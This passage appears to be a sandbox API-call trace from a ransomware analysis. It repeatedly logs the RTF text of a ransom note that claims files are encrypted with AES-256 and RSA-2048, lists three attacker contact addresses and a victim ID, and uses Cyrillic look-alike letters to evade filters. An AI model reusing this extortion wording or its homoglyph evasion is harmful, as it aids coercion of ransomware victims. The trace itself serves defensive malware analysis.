m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.022] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.022] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will 